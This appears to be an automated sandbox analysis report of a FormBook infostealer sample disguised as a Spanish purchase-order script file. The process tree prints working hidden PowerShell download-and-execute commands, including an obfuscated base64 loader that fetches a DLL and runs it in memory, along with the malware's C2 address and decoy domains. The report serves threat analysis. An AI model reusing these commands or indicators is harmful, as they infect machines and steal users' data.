Windows Analysis Report
NUEVA ORDEN DE COMPRA 80107.wsf
Overview
General Information
Detection
FormBook
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
- wscript.exe (PID: 6632 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRA 80107.wsf" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 6096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- explorer.exe (PID: 6740 cmdline: "C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 6164 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- wscript.exe (PID: 4544 cmdline: "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- powershell.exe (PID: 2328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALgAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6996 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 5076 cmdline: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- RegAsm.exe (PID: 7076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
- explorer.exe (PID: 3688 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- powershell.exe (PID: 1320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 4152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 MD5: 95000560239032BC68B4C2FDFCDEF913)
- wscript.exe (PID: 7024 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- WWAHost.exe (PID: 5680 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
- cmd.exe (PID: 508 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- explorer.exe (PID: 3504 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 4100 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- explorer.exe (PID: 3616 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
{"C2 list": ["www.hibikaiteki.com/s4ig/"], "decoy": ["60carrst-th15.com", "suapeleemprimeirolugar.com", "fairble.com", "7890136.com", "toastingthetunnos.com", "znetonline.net", "ginamora.com", "salazarcomunicacion.com", "acesso-livre-mercado.com", "nancykmorrison.store", "amazonwisely.com", "dannymarkphotography.com", "tenlog029.xyz", "quickfinderplus.online", "abdomenpkluwk.xyz", "portraypsdbmv.top", "arst4you.com", "doublehartpress.com", "deadsdradqueer.com", "salvaescalerasarnet.com", "givingisnotagiven.com", "vellegallery.com", "rtva.top", "nexusbalance.com", "createurs-de-bijoux.com", "kellybavis.com", "giaohanggiaretetkiemhcm.com", "cukis-prakerja.xyz", "dbk3.com", "40dgj.xyz", "bikebrewandflights.com", "lovinlufkin.com", "redentor.digital", "rqgmarket.com", "kindofgoodsco.com", "tb25431.icu", "caui.top", "mercedesfbs4.com", "yadook.com", "rab-pas-vervallen.icu", "shref94.com", "chinafireratedglass.com", "driftwoodbeachclub.com", "mentication.com", "schedulekeymail.com", "cameraderie.photography", "promoapp12.com", "modart.xyz", "choicearticleto-readtoday.info", "prostitutkitambovasuck.info", "mgav21.xyz", "idreamtz.com", "keepcharged.online", "gobigmedia.net", "cookinkele.com", "99lottery.info", "atlantidepc.com", "univerdelacreation.com", "thuongmainongnghiep.com", "thulasiabc.com", "sushifactoryamphawa.com", "emprendedor-virtual.com", "3laaaldin.com", "madisonboles.com"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
 | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | |
 | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | |
 | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
 | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
 | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | |
 | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | |
 | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
 | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | |
No Sigma rule has matched
Timestamp: | 05/27/22-21:15:48.653624 |
Source IP: | 20.106.232.4 |
Destination IP: | 192.168.2.6 |
Source Port: | 80 |
Destination Port: | 49769 |
SID: | 2025011 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | File source: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira: | ||
Source: | Binary string: | ||
Source: | File opened: | ||
Source: | Code function: | ||
Networking |
---|
Source: | Network Connect: | ||
Source: | Domain query: | ||
Source: | Snort IDS: |
Source: | Bad PDF prefix: |